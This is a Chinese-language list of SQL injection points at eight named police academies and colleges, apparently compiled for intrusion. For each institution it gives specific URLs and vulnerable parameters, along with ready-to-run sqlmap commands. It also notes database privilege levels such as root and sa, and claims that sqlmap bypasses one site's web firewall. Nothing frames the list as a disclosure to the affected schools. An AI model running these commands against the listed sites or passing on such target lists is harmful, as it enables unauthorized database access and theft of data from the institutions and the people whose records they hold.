1、中国人民公安大学
http://www.cppsu.edu.cn/jiaxiao/ruler_view.cfm?id=40 驾校这个目录下还有其他注入点。
2、福建警察学校
http://www.fjpsc.edu.cn/admin/ad_login.aspx http头注入,参数:X-Forwarded-For
抓包:
python sqlmap.py -r fujian.txt --level 3 --risk
3、吉林警察学院
python sqlmap.py -u 'http://www.jljcxy.com/thirdparty/apprise/testdetail.jsp?s=1' root用户
还有注入点:
http://www.jljcxy.com/thirdparty/apprise/pingbi.jsp 中ipt_date_end 和 ipt_date_start 两个参数存在post注入
学校分站 jiaoyu.jljcxy.com/jiaoyu/Login_xsmm.asp,XH参数post注入
4、四川警察学院
分站http://lib.scpolicec.edu.cn/admin/show-test2.asp?id=221
5、云南警官学院
python sqlmap.py -u http://210.40.208.4/sbweb/chk.asp --data="uid=" sa权限!! post注入
6、安徽警官职业学院
sqlmap可直接绕过web防火墙检测漏洞存在
python sqlmap.py -u http://chengji.ahjgxy.com/webzsjs/show.aspx?id=11
python sqlmap.py -u http://chengji.ahjgxy.com/webzsjs/subpage1.aspx?strNo=bc1
要进一步获取数据库信息的话,应该需要更改代码。
7、陕西警官职业学院
python sqlmap.py -u http://www.sxjgxy.edu.cn/www/content.asp?leaf_id=4248
8、台湾警察专科学校的注入点
python sqlmap.py -u "http://ipac.tpa.edu.tw:82/ipac20/ipac.jsp?session=1B293V4020187.3159&menu=search&aspect=basic&npp=10&ipp=20&profile=tpalib&ri=&term=1111&index=.GW&x=8&y=17&aspect=basic" -p "profile" 只是证明了注入点存在。